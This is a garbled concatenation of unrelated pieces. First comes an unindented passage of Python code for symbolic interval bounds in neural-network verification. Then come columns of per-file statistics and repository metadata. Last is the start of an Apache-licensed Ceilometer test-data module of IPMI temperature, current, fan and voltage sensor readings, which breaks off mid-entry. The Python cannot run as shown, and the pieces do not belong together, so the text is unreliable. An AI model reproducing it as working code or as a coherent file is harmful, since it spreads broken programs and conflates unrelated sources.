Interval.__init__(self, lower, upper)
self.use_cuda = use_cuda
self.shape = list(self.c.shape[1:])
self.n = list(self.c[0].reshape(-1).size())[0]
self.input_size = self.n
self.batch_size = self.c.shape[0]
if(self.use_cuda):
self.idep = torch.eye(self.n, device=\
self.c.get_device())
else:
self.idep = torch.eye(self.n)
self.edep = []
self.edep_ind = []
self.proj_ind = proj_ind
if(proj>self.input_size):
warnings.warn("proj is larger than input size")
self.proj = self.input_size
else:
self.proj = proj
if(proj_ind is None):
idep_ind = np.arange(self.proj)
proj_ind = np.arange(self.proj, self.input_size)
self.idep_proj = self.idep[proj_ind].sum(dim=0).unsqueeze(0)
self.idep = self.idep[idep_ind].unsqueeze(0)
self.idep_proj = self.idep_proj*self.e.\
view(self.batch_size, self.input_size)
self.e = self.e.view(self.batch_size, self.input_size)[:, idep_ind]
else:
self.idep = self.idep.unsqueeze(0)*\
self.e.view(self.batch_size,1,self.n)
#print(self.idep.shape, proj_ind.shape)
self.idep = self.idep.gather(index=proj_ind.\
unsqueeze(-1).repeat(1,1,self.n), dim=1)
#print(self.idep.shape)
self.idep_proj = (self.idep.sum(dim=1)==0).type_as(self.idep)
self.idep_proj = self.idep_proj*\
self.e.view(self.batch_size, self.input_size)
#print("proj",self.idep_proj.shape)
'''Calculating the upper and lower matrix for symbolic intervals.
To make concretize easier, convolutional layer nodes will be
extended first.
'''
def concretize(self):
self.extend()
if(self.proj_ind is None):
e = (self.idep*self.e.view(self.batch_size,\
self.proj, 1)).abs().sum(dim=1)
else:
e = self.idep.abs().sum(dim=1)
#print("e1", e)
e = e + self.idep_proj.abs()
#print("e2", e)
if(self.edep):
for i in range(len(self.edep)):
e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
#print("e3", e)
self.l = self.c - e
self.u = self.c + e
return self
'''Extending convolutional layer nodes to a two-dimensional vector.
'''
def extend(self):
self.c = self.c.reshape(self.batch_size, self.n)
self.idep = self.idep.reshape(-1, self.proj, self.n)
self.idep_proj = self.idep_proj.reshape(-1, self.n)
for i in range(len(self.edep)):
self.edep[i] = self.edep[i].reshape(-1, self.n)
'''Convert the extended layer back to the shape stored in `shape`.
'''
def shrink(self):
self.c = self.c.reshape(tuple([-1]+self.shape))
self.idep = self.idep.reshape(tuple([-1]+self.shape))
self.idep_proj = self.idep_proj.view(tuple([self.batch_size]+self.shape))
for i in range(len(self.edep)):
self.edep[i] = self.edep[i].reshape(\
tuple([-1]+self.shape))
'''Calculate the wrost case of the analyzed output ranges.
Return the upper bound of other output dependency minus target's
output dependency. If the returned value is less than 0, it means
the worst case provided by interval analysis will never be larger
than the target label y's.
'''
def worst_case(self, y, output_size):
assert y.shape[0] == self.l.shape[0] == self.batch_size,\
"wrong label shape"
if(self.use_cuda):
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False, device=y.get_device())[y]
else:
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False)[y]
c_t = self.c.masked_select(kk).unsqueeze(1)
self.c = self.c - c_t
idep_t = self.idep.masked_select(\
kk.view(self.batch_size,1,output_size)).\
view(self.batch_size, self.proj,1)
self.idep = self.idep-idep_t
idep_proj_t = self.idep_proj.masked_select(kk)
self.idep_proj = self.idep_proj+idep_proj_t.view(-1,1)
self.idep_proj = self.idep_proj*(1-kk).type_as(self.idep_proj)
for i in range(len(self.edep)):
edep_t = self.edep[i].masked_select((self.edep_ind[i].\
mm(kk.type_as(self.edep_ind[i]))).type_as(kk)).\
view(-1,1)
self.edep[i] = self.edep[i]-edep_t
self.concretize()
return self.u
class Symbolic_interval_proj2(Interval):
'''
* :attr:`shape` is the input shape of ReLU layers.
* :attr:`n` is the number of hidden nodes in each layer.
* :attr:`idep` keeps the input dependencies.
* :attr:`edep` keeps the error dependency introduced by each
overestimated nodes.
'''
def __init__(self, lower, upper, proj=None,\
proj_ind=None, use_cuda=False):
assert lower.shape[0]==upper.shape[0], "each symbolic"+\
"should have the same shape"
Interval.__init__(self, lower, upper)
self.use_cuda = use_cuda
self.shape = list(self.c.shape[1:])
self.n = list(self.c[0].reshape(-1).size())[0]
self.input_size = self.n
self.batch_size = self.c.shape[0]
if(self.use_cuda):
self.idep = torch.eye(self.n, device=\
self.c.get_device())
else:
self.idep = torch.eye(self.n)
self.edep = self.e.new_zeros(self.e.shape)
self.proj_ind = proj_ind
self.proj = proj
if(proj_ind is None):
idep_ind = np.arange(self.proj)
proj_ind = np.arange(self.proj, self.input_size)
self.idep_proj = self.idep[proj_ind].sum(dim=0).unsqueeze(0)
self.idep = self.idep[idep_ind].unsqueeze(0)
self.idep_proj = self.idep_proj*self.e.\
view(self.batch_size, self.input_size)
self.e = self.e.view(self.batch_size,\
self.input_size)[:, idep_ind]
else:
self.idep = self.idep.unsqueeze(0)*\
self.e.view(self.batch_size,1,self.n)
#print(self.idep.shape, proj_ind.shape)
self.idep = self.idep.gather(index=proj_ind.\
unsqueeze(-1).repeat(1,1,self.n), dim=1)
#print(self.idep.shape)
self.idep_proj = (self.idep.sum(dim=1)==0).type_as(self.idep)
self.idep_proj = self.idep_proj*\
self.e.view(self.batch_size, self.input_size)
#print("proj",self.idep_proj.shape)
'''Calculating the upper and lower matrix for symbolic intervals.
To make concretize easier, convolutional layer nodes will be
extended first.
'''
def concretize(self):
self.extend()
if(self.proj_ind is None):
e = (self.idep*self.e.view(self.batch_size,\
self.proj, 1)).abs().sum(dim=1)
else:
e = self.idep.abs().sum(dim=1)
#print("e1", e)
e = e + self.idep_proj.abs()
#print("e2", e)
e = e + self.edep.abs()
#print("e3", e)
self.l = self.c - e
self.u = self.c + e
return self
'''Extending convolutional layer nodes to a two-dimensional vector.
'''
def extend(self):
self.c = self.c.reshape(self.batch_size, self.n)
self.idep = self.idep.reshape(-1, self.proj, self.n)
self.idep_proj = self.idep_proj.reshape(-1, self.n)
self.edep = self.edep.reshape(self.batch_size, self.n)
'''Convert the extended layer back to the shape stored in `shape`.
'''
def shrink(self):
self.c = self.c.reshape(tuple([-1]+self.shape))
self.idep = self.idep.reshape(tuple([-1]+self.shape))
self.idep_proj = self.idep_proj.view(tuple([self.batch_size]+self.shape))
self.edep = self.edep.view(tuple([-1]+self.shape))
'''Calculate the wrost case of the analyzed output ranges.
Return the upper bound of other output dependency minus target's
output dependency. If the returned value is less than 0, it means
the worst case provided by interval analysis will never be larger
than the target label y's.
'''
def worst_case(self, y, output_size):
assert y.shape[0] == self.l.shape[0] == self.batch_size,\
"wrong label shape"
if(self.use_cuda):
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False, device=y.get_device())[y]
else:
kk = torch.eye(output_size, dtype=torch.uint8,\
requires_grad=False)[y]
c_t = self.c.masked_select(kk).unsqueeze(1)
self.c = self.c - c_t
idep_t = self.idep.masked_select(\
kk.view(self.batch_size,1,output_size)).\
view(self.batch_size, self.proj,1)
self.idep = self.idep-idep_t
idep_proj_t = self.idep_proj.masked_select(kk)
self.idep_proj = self.idep_proj+idep_proj_t.view(-1,1)
self.idep_proj = self.idep_proj*(1-kk).type_as(self.idep_proj)
edep_t = self.edep.masked_select(kk)
self.edep = self.edep+edep_t.view(-1,1)
self.edep = self.edep*(1-kk).type_as(self.edep)
self.concretize()
return self.u
class gen_sym(Symbolic_interval):
def __init__(self, lower, upper, epsilon=[0, 0, 0], norm=["linf", "l2", "l1"], use_cuda=False):
Symbolic_interval.__init__(self, lower, upper, epsilon, norm, use_cuda)
self.use_cuda = use_cuda
self.shape = list(self.c.shape[1:])
self.n = list(self.c[0].reshape(-1).size())[0]
self.input_size = self.n
self.batch_size = self.c.shape[0]
self.epsilon = epsilon
self.norm = norm
if(self.use_cuda):
self.idep = torch.eye(self.n, device=\
self.c.get_device()).unsqueeze(0)
else:
self.idep = torch.eye(self.n).unsqueeze(0)
self.edep = []
self.edep_ind = []
def concretize(self):
self.extend()
e = None
for i in range(len(self.norm)):
if self.norm[i] == "linf":
e0 = (self.idep*self.e.view(self.batch_size,\
self.input_size, 1)).abs().sum(dim=1)
elif self.norm[i] == "l2":
idep = torch.norm(self.idep, dim=1, keepdim=False)
e0 = idep*self.epsilon[i]
elif self.norm[i] == "l1":
idep = self.idep.abs().max(dim=1, keepdim=False)[0]
e0 = idep*self.epsilon[i]
if e is None:
e = e0
else:
e = torch.where(e>e0, e, e0)
if self.edep:
#print("sym e1", e)
for i in range(len(self.edep)):
e = e + self.edep_ind[i].t().mm(self.edep[i].abs())
#print("sym e2", e)
self.l = self.c - e
self.u = self.c + e
return self
| 29.728972
| 96
| 0.682175
| 4,222
| 25,448
| 4.020133
| 0.083373
| 0.057974
| 0.036764
| 0.036057
| 0.80958
| 0.786367
| 0.772757
| 0.764508
| 0.762564
| 0.744182
| 0
| 0.015563
| 0.171801
| 25,448
| 855
| 97
| 29.763743
| 0.789761
| 0.212001
| 0
| 0.83731
| 0
| 0
| 0.02801
| 0
| 0
| 0
| 0
| 0
| 0.030369
| 1
| 0.073753
| false
| 0
| 0.008677
| 0
| 0.130152
| 0.002169
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
583219fe7021da84b985f05e6b8fe475fa7375d0
| 30,181
|
py
|
Python
|
ceilometer/tests/unit/ipmi/notifications/ipmi_test_data.py
|
maestro-hybrid-cloud/ceilometer
|
939cb080a193e14af8ceb44df3b631f5c2f6bf6d
|
[
"Apache-2.0"
] | 1
|
2016-03-10T06:55:45.000Z
|
2016-03-10T06:55:45.000Z
|
ceilometer/tests/unit/ipmi/notifications/ipmi_test_data.py
|
maestro-hybrid-cloud/ceilometer
|
939cb080a193e14af8ceb44df3b631f5c2f6bf6d
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/unit/ipmi/notifications/ipmi_test_data.py
|
maestro-hybrid-cloud/ceilometer
|
939cb080a193e14af8ceb44df3b631f5c2f6bf6d
|
[
"Apache-2.0"
] | 3
|
2015-10-08T20:03:36.000Z
|
2020-02-05T10:45:50.000Z
|
#
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Sample data for test_ipmi.
This data is provided as a sample of the data expected from the ipmitool
driver in the Ironic project, which is the publisher of the notifications
being tested.
"""
TEMPERATURE_DATA = {
'DIMM GH VR Temp (0x3b)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '26 (+/- 0.500) degrees C',
'Entity ID': '20.6 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM GH VR Temp (0x3b)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'CPU1 VR Temp (0x36)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '32 (+/- 0.500) degrees C',
'Entity ID': '20.1 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'CPU1 VR Temp (0x36)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'DIMM EF VR Temp (0x3a)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '26 (+/- 0.500) degrees C',
'Entity ID': '20.5 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM EF VR Temp (0x3a)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'CPU2 VR Temp (0x37)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '31 (+/- 0.500) degrees C',
'Entity ID': '20.2 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'CPU2 VR Temp (0x37)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'Ambient Temp (0x32)': {
'Status': 'ok',
'Sensor Reading': '25 (+/- 0) degrees C',
'Entity ID': '12.1 (Front Panel Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Event Message Control': 'Per-threshold',
'Assertion Events': '',
'Upper non-critical': '43.000',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Upper non-recoverable': '50.000',
'Positive Hysteresis': '4.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '46.000',
'Sensor ID': 'Ambient Temp (0x32)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '25.000'
},
'Mezz Card Temp (0x35)': {
'Status': 'Disabled',
'Sensor Reading': 'Disabled',
'Entity ID': '44.1 (I/O Module)',
'Event Message Control': 'Per-threshold',
'Upper non-critical': '70.000',
'Upper non-recoverable': '85.000',
'Positive Hysteresis': '4.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'Mezz Card Temp (0x35)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '25.000'
},
'PCH Temp (0x3c)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '46 (+/- 0.500) degrees C',
'Entity ID': '45.1 (Processor/IO Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '93.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '103.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '98.000',
'Sensor ID': 'PCH Temp (0x3c)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'DIMM CD VR Temp (0x39)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '27 (+/- 0.500) degrees C',
'Entity ID': '20.4 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM CD VR Temp (0x39)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'PCI Riser 2 Temp (0x34)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '30 (+/- 0) degrees C',
'Entity ID': '16.2 (System Internal Expansion Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '70.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '85.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'PCI Riser 2 Temp (0x34)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'DIMM AB VR Temp (0x38)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '28 (+/- 0.500) degrees C',
'Entity ID': '20.3 (Power Module)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '95.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '105.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '100.000',
'Sensor ID': 'DIMM AB VR Temp (0x38)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
'PCI Riser 1 Temp (0x33)': {
'Status': 'ok',
'Deassertions Enabled': 'unc+ ucr+ unr+',
'Sensor Reading': '38 (+/- 0) degrees C',
'Entity ID': '16.1 (System Internal Expansion Board)',
'Assertions Enabled': 'unc+ ucr+ unr+',
'Positive Hysteresis': '4.000',
'Assertion Events': '',
'Upper non-critical': '70.000',
'Event Message Control': 'Per-threshold',
'Upper non-recoverable': '85.000',
'Normal Maximum': '112.000',
'Maximum sensor range': 'Unspecified',
'Sensor Type (Analog)': 'Temperature',
'Readable Thresholds': 'unc ucr unr',
'Negative Hysteresis': 'Unspecified',
'Threshold Read Mask': 'unc ucr unr',
'Upper critical': '80.000',
'Sensor ID': 'PCI Riser 1 Temp (0x33)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '16.000'
},
}
CURRENT_DATA = {
'Avg Power (0x2e)': {
'Status': 'ok',
'Sensor Reading': '130 (+/- 0) Watts',
'Entity ID': '21.0 (Power Management)',
'Assertions Enabled': '',
'Event Message Control': 'Per-threshold',
'Readable Thresholds': 'No Thresholds',
'Positive Hysteresis': 'Unspecified',
'Sensor Type (Analog)': 'Current',
'Negative Hysteresis': 'Unspecified',
'Maximum sensor range': 'Unspecified',
'Sensor ID': 'Avg Power (0x2e)',
'Assertion Events': '',
'Minimum sensor range': '2550.000',
'Settable Thresholds': 'No Thresholds'
}
}
FAN_DATA = {
'Fan 4A Tach (0x46)': {
'Status': 'ok',
'Sensor Reading': '6900 (+/- 0) RPM',
'Entity ID': '29.4 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2580.000',
'Positive Hysteresis': '120.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '15300.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '120.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 4A Tach (0x46)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '4020.000'
},
'Fan 5A Tach (0x48)': {
'Status': 'ok',
'Sensor Reading': '7140 (+/- 0) RPM',
'Entity ID': '29.5 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2580.000',
'Positive Hysteresis': '120.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '15300.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '120.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 5A Tach (0x48)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '4020.000'
},
'Fan 3A Tach (0x44)': {
'Status': 'ok',
'Sensor Reading': '6900 (+/- 0) RPM',
'Entity ID': '29.3 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2580.000',
'Positive Hysteresis': '120.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '15300.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '120.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 3A Tach (0x44)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '4020.000'
},
'Fan 1A Tach (0x40)': {
'Status': 'ok',
'Sensor Reading': '6960 (+/- 0) RPM',
'Entity ID': '29.1 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2580.000',
'Positive Hysteresis': '120.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '15300.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '120.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 1A Tach (0x40)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '4020.000'
},
'Fan 3B Tach (0x45)': {
'Status': 'ok',
'Sensor Reading': '7104 (+/- 0) RPM',
'Entity ID': '29.3 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2752.000',
'Positive Hysteresis': '128.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '16320.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '128.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 3B Tach (0x45)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3968.000'
},
'Fan 2A Tach (0x42)': {
'Status': 'ok',
'Sensor Reading': '7080 (+/- 0) RPM',
'Entity ID': '29.2 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2580.000',
'Positive Hysteresis': '120.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '15300.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '120.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 2A Tach (0x42)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '4020.000'
},
'Fan 4B Tach (0x47)': {
'Status': 'ok',
'Sensor Reading': '7488 (+/- 0) RPM',
'Entity ID': '29.4 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2752.000',
'Positive Hysteresis': '128.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '16320.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '128.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 4B Tach (0x47)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3968.000'
},
'Fan 2B Tach (0x43)': {
'Status': 'ok',
'Sensor Reading': '7168 (+/- 0) RPM',
'Entity ID': '29.2 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2752.000',
'Positive Hysteresis': '128.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '16320.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '128.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 2B Tach (0x43)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3968.000'
},
'Fan 5B Tach (0x49)': {
'Status': 'ok',
'Sensor Reading': '7296 (+/- 0) RPM',
'Entity ID': '29.5 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2752.000',
'Positive Hysteresis': '128.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '16320.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '128.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 5B Tach (0x49)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3968.000'
},
'Fan 1B Tach (0x41)': {
'Status': 'ok',
'Sensor Reading': '7296 (+/- 0) RPM',
'Entity ID': '29.1 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2752.000',
'Positive Hysteresis': '128.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '16320.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '128.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 1B Tach (0x41)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3968.000'
},
'Fan 6B Tach (0x4b)': {
'Status': 'ok',
'Sensor Reading': '7616 (+/- 0) RPM',
'Entity ID': '29.6 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2752.000',
'Positive Hysteresis': '128.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '16320.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '128.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 6B Tach (0x4b)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '3968.000'
},
'Fan 6A Tach (0x4a)': {
'Status': 'ok',
'Sensor Reading': '7080 (+/- 0) RPM',
'Entity ID': '29.6 (Fan Device)',
'Assertions Enabled': 'lcr-',
'Normal Minimum': '2580.000',
'Positive Hysteresis': '120.000',
'Assertion Events': '',
'Event Message Control': 'Per-threshold',
'Normal Maximum': '15300.000',
'Deassertions Enabled': 'lcr-',
'Sensor Type (Analog)': 'Fan',
'Lower critical': '1920.000',
'Negative Hysteresis': '120.000',
'Threshold Read Mask': 'lcr',
'Maximum sensor range': 'Unspecified',
'Readable Thresholds': 'lcr',
'Sensor ID': 'Fan 6A Tach (0x4a)',
'Settable Thresholds': '',
'Minimum sensor range': 'Unspecified',
'Nominal Reading': '4020.000'
}
}
VOLTAGE_DATA = {
'Planar 12V (0x18)': {
'Status': 'ok',
'Sensor Reading': '12.312 (+/- 0) Volts',
'Entity ID': '7.1 (System Board)',
'Assertions Enabled': 'lcr- ucr+',
'Event Message Control': 'Per-threshold',
'Assertion Events': '',
'Maximum sensor range': 'Unspecified',
'Positive Hysteresis': '0.108',
'Deassertions Enabled': 'lcr- ucr+',
'Sensor Type (Analog)': 'Voltage',
'Lower critical': '10.692',
'Negative Hysteresis': '0.108',
'Threshold Read Mask': 'lcr ucr',
'Upper critical': '13.446',
'Readable Thresholds': 'lcr ucr',
'Sensor ID': 'Planar 12V (0x18)',
